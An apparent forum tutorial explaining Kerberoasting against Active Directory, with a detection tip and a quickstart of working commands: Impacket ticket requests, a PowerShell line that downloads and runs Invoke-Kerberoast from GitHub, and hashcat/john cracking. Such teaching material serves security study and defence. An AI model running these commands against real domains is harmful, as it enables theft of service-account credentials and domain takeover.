Hello Stackers, Kerberoasting is an attack against Kerberos, the authentication protocol that Windows Active Directory domains use to authenticate users and computers. Any authenticated domain user can ask the domain controller for a service ticket for any account that has a Service Principal Name (SPN) registered. That ticket is encrypted with a key derived from the service account's password, so the attacker takes it offline and runs a dictionary or brute-force attack against it; a successful crack yields the service account's plaintext password and whatever access that account has.
Before digging deeper into how Kerberoasting works, one should understand how service accounts are typically set up in AD:
- Service account passwords are usually chosen by a person, frequently flagged "password never expires", and rarely rotated, so they tend to be old and weak.
- Many service accounts hold elevated permissions, and some are members of highly privileged groups such as Domain Admins, which gives full administrative rights over AD.
- Cracking a service account password lets the attacker authenticate as that account; when the account is privileged, that is enough to compromise the entire AD domain.
Kerberos authenticates users and devices without sending the password over the network. The client proves knowledge of its password to the Key Distribution Center (KDC), receives a ticket-granting ticket (TGT), and then presents the TGT to obtain a service ticket (TGS) for each service it wants to use. The service ticket is encrypted with the long-term key of the service account that owns the SPN, so that only that service can decrypt it. This is exactly what Kerberoasting abuses: the KDC hands a valid service ticket to any authenticated user who asks for it, and the attacker can crack that ticket offline, with no further contact with the domain and no failed-logon events. When the ticket is encrypted with RC4-HMAC (encryption type 23), the key is simply the account's NT hash (MD4 of the UTF-16LE password, no salt), which makes guessing extremely fast; Kerberoasting tools therefore request RC4 explicitly. AES-encrypted tickets (types 17 and 18) can also be cracked, but far more slowly, because the key is derived from the password with PBKDF2. On the defensive side, a burst of Event ID 4769 (service ticket requested) entries with Ticket Encryption Type 0x17 from one user is the classic Kerberoasting signature.
Quickstart
With Impacket example GetUserSPNs.py:
python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -dc-ip <dc_ip> -request -outputfile <output_TGSs_file>
Without -request the script only enumerates accounts that have SPNs; with it, the tickets are written to the output file in a format that hashcat and john read directly.
With Powershell:
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>
Cracking offline with a dictionary of passwords:
hashcat -m 13100 <TGSs_file> <passwords_file>
john --format=krb5tgs --wordlist=<passwords_file> <TGSs_file>
Mode 13100 is for RC4-HMAC tickets (etype 23); for AES tickets use hashcat modes 19600 (etype 17) and 19700 (etype 18). Since the cracking is entirely offline, failed guesses never reach the domain controller.
Okay, that's all, see you later.